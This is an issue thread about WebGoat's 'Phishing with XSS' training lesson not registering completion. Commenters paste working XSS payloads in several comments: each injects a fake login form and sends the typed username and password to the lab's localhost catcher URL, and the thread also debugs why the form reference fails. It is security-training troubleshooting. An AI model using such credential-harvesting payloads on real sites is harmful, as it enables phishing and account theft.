Phishing with XSS issue. Can't be resolved
Closed this issue · 7 comments
GoogleCodeExporter commented
What steps will reproduce the problem?
1. copy/paste the solution in the search field
2. click login
3. nothing appends
What is the expected output? What do you see instead?
A congratulation message should appeared.
What version of the product are you using? On what operating system?
Tested with Iceweasel on Debian and Firefox on MacOS with WebGoat 5.3
Please provide any additional information below.
Original issue reported on code.google.com by ol.batard@gmail.com on 16 Feb 2010 at 6:48
GoogleCodeExporter commented
Here are a few of the things I tried for Phishing w/ XSS. Neither of the first
two
would work when pasted in the box, but they triggered the check-off when in an
html
page by themselves and the login information was submitted.
* foo<script>function muahahaha(){ alert("User Name = " +
document.forms[0].user.value + "; Password = " + document.forms[0].pass.value);
XSSImage=new Image();
XSSImage.src="http://localhost/webgoat/catcher?PROPERTY=yes&user=" +
document.forms[0].user.value + "&password=" +
document.forms[0].pass.value;}</script><form><br><br>login:<br><br>Enter
Username:<br><input type="text" name="user" name="user"><br>Enter
Password:<br><input
type="password" name = "pass"><br><input type="submit" name="login"
value="login"
onclick="muahahaha()"></form>
* bar<form><br><br>login:<br><br>Enter Username:<br><input type="text"
name="user" name="user"><br>Enter Password:<br><input type="password" name =
"pass"><br><input type="submit" name="login" value="login" onclick="var
XSSImage=new
Image(); XSSImage.src='http://localhost/webgoat/catcher?PROPERTY=yes&user=' +
this.form.user.value + '&password=' + this.form.pass.value;"></form>
* Substituting the variables with their values in the URL
(http://localhost/webgoat/catcher?PROPERTY=yes&user=guest&password=guest) and
pasting
that in the box works fine, though that doesn't illustrate the vulnerability.
I tried this on Firefox on Ubuntu. I isolated the problem to the inability to
access
"document.forms[0].user.value" in the lesson page, but it is unclear to me why
the
standalone works. Let me know if you figure this out.
Original comment by Lysand...@gmail.com on 21 Mar 2010 at 7:21
GoogleCodeExporter commented
Original comment by mayhe...@gmail.com on 24 Mar 2010 at 8:34
- Changed state: Accepted
GoogleCodeExporter commented
I could fix this by giving my form inputs an Id an accessing them via
document.getElementById('username') etc.
Original comment by linux.ni...@gmail.com on 9 Jun 2010 at 7:18
GoogleCodeExporter commented
I face the same issue. Phishing with XSS doesn't work. I am using windows 7. If
I click Hint, Show Params and Show cookies all three then it creates an
additional login form above and that works. Which seems odd. Please fix this.
Original comment by nishikum...@gmail.com on 25 Apr 2011 at 1:22
GoogleCodeExporter commented
The problem is with the "document.forms[0].user.value" problem as was mentioned
above. There is another form before the one that needs to be changed, so
"forms[0]" targets the wrong one.
Using "document.form.user.value" (the form we want is named "form") works. You
should also be able to use "document.forms[1].user.value". I've already fixed
this in the hints and solutions, I just haven't pushed the update yet. I'll
switch this to "fixed" once I commit the updates.
Original comment by X71...@gmail.com on 4 Aug 2011 at 2:42
- Changed state: Started
GoogleCodeExporter commented
Original comment by mayhe...@gmail.com on 24 Apr 2012 at 11:08
- Changed state: Fixed
GoogleCodeExporter commented
I solved this inserting my port number 8080 after localhost, like this:
XSSImage.src="http://127.0.0.1:8080/WebGoat/catcher?PROPERTY=yes&user="+
document.phish.user.value + "&password=" + document.phish.pass.value + "";
Original comment by Mint...@gmail.com on 5 Jul 2013 at 11:57